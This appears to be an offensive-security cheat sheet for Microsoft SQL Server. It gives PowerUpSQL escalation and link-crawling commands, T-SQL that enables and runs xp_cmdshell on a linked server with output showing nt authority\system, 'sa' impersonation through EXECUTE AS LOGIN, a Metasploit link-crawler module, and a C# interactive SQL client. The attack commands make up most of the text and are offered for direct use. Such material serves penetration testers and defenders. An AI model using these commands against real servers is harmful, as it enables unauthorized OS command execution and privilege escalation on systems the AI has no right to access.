MSSQL
PowerUpSQL
Get-SQLServerLink -Instance server -Verbose
powershell.exe -c "Import-Module C:\Users\Public\PowerUpSQL.ps1; Invoke-SQLEscalatePriv -Verbose -Instance ECORP\sql01"
Linked servers
select srvname from master..sysservers;
Native
Get-SQLServerLinkCrawl -Instance server -Query "exec master..xp_cmdshell 'whoami'"
Linked database tables
select * from openquery(foo, 'select TABLE_NAME from FOO.INFORMATION_SCHEMA.TABLES')
Meterpreter module,
exploit/windows/mssql/mssql_linkcrawler
Mssqlclient.py,
execute ('sp_configure ''show advanced options'', 1') at sql99;
execute (' reconfigure; ') at sql99;
execute (' sp_configure ''xp_cmdshell'',1 ') at sql99;
execute (' reconfigure; ') at sql99;
execute (' xp_cmdshell ''whoami'' ') at sql99;
SQL> execute (' xp_cmdshell ''whoami'' ') at sql99;
output
---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
nt authority\system
NULL
Impersonation
Check whether you can impersonate other users:
SELECT distinct b.name FROM sys.server_permissions a INNER JOIN sys.server_principals b ON a.grantor_principal_id = b.principal_id WHERE a.permission_name = 'IMPERSONATE'
You can then impersonate one of those users with:
EXECUTE AS LOGIN = 'sa';
Verify the impersonation with:
select SYSTEM_USER;
Mssql Client in C#
Compile using `csc.exe mssql_client.cs` (the usage examples below assume the resulting binary was renamed to `sql.exe`).
using System;
using System.Collections.Generic;
using System.Linq;
using System.Text;
using System.Threading.Tasks;
using System.Data.SqlClient;
using System.Collections;
namespace SQL
{
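public class SQL
{
    /// <summary>
    /// Executes <paramref name="execCmd"/> on an open connection and returns the
    /// first column of every returned row, one value per line.
    /// </summary>
    /// <param name="con">An already-opened connection.</param>
    /// <param name="execCmd">T-SQL text that is sent to the server verbatim.</param>
    /// <returns>
    /// Newline-terminated first-column values; an empty string when the statement
    /// produces no rows or no result set. A DBNull value renders as an empty line.
    /// </returns>
    /// <exception cref="SqlException">Propagated when the server rejects the statement.</exception>
    static String Run(SqlConnection con, string execCmd)
    {
        StringBuilder res = new StringBuilder();
        // Dispose command and reader deterministically so a statement that throws
        // does not leave a pending result set on the shared connection.
        using (SqlCommand command = new SqlCommand(execCmd, con))
        using (SqlDataReader reader = command.ExecuteReader())
        {
            while (reader.Read())
            {
                res.Append(reader[0]).Append('\n');
            }
        }
        return res.ToString();
    }

    /// <summary>
    /// Interactive prompt: reads one statement per line and prints its result
    /// until "exit" is typed or standard input reaches end of stream.
    /// </summary>
    /// <param name="con">An already-opened connection.</param>
    static void RunInteractive(SqlConnection con)
    {
        while (true)
        {
            Console.Write("#>");
            String query = Console.ReadLine();
            // ReadLine returns null at EOF (e.g. piped stdin); treat that like
            // "exit" rather than handing a null command text to SqlCommand.
            if (query == null || query == "exit")
            {
                return;
            }
            Console.WriteLine("[+] Executing query: {0}", query);
            try
            {
                Console.WriteLine(Run(con, query));
            }
            catch (Exception ex)
            {
                // Do not re-run the failing statement here: a second throw would
                // escape the loop and terminate the prompt. Report and continue.
                Console.WriteLine("[!] Failed to execute the query: {0}", ex.Message);
            }
        }
    }

    /// <summary>
    /// Entry point. Usage: <c>sql.exe &lt;server&gt; [/i | "&lt;statements&gt;"]</c>.
    /// Connects to the <c>master</c> database with integrated security, prints the
    /// authenticated login and database user, then either starts the interactive
    /// prompt (<c>/i</c>) or runs each newline-separated statement of the second argument.
    /// </summary>
    /// <param name="args">args[0] is the server; args[1] is "/i" or the statement text.</param>
    public static void Main(string[] args)
    {
        if (args.Length < 1)
        {
            Console.WriteLine("Usage: sql.exe <server> [/i | \"<query>\"]");
            return;
        }
        String sqlServer = args[0];
        String database = "master";
        String command = (args.Length > 1 ? args[1] : "");
        // Build the connection string with the builder rather than by concatenation,
        // so a server argument containing ';' or '=' cannot smuggle in extra
        // keywords (credentials, encryption settings) behind the operator's back.
        SqlConnectionStringBuilder csb = new SqlConnectionStringBuilder();
        csb.DataSource = sqlServer;
        csb.InitialCatalog = database;
        csb.IntegratedSecurity = true;
        using (SqlConnection con = new SqlConnection(csb.ConnectionString))
        {
            try
            {
                con.Open();
                Console.WriteLine("Auth success!");
            }
            catch (Exception ex)
            {
                // Surface the reason (wrong host, Kerberos failure, ...) instead of a bare "failed".
                Console.WriteLine("Auth failed: {0}", ex.Message);
                return;
            }
            // SYSTEM_USER is the server-level login; USER_NAME() is the database
            // user it maps to in the current database. The labels were previously swapped.
            String login = Run(con, "select SYSTEM_USER").Trim();
            String user = Run(con, "select USER_NAME()").Trim();
            Console.WriteLine(String.Format("[+] Login: {0}", login));
            Console.WriteLine(String.Format("[+] User: {0}", user));
            // Compare the already-defaulted 'command' so a single-argument
            // invocation no longer indexes past the end of args.
            if (command == "/i")
            {
                RunInteractive(con);
                return;
            }
            foreach (String sql in command.Split('\n'))
            {
                if (sql.Trim().Length > 0)
                {
                    Console.WriteLine(Run(con, sql));
                }
            }
        }
    }
}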
}
.\sql.exe localhost /i
.\sql.exe localhost 'select @@version'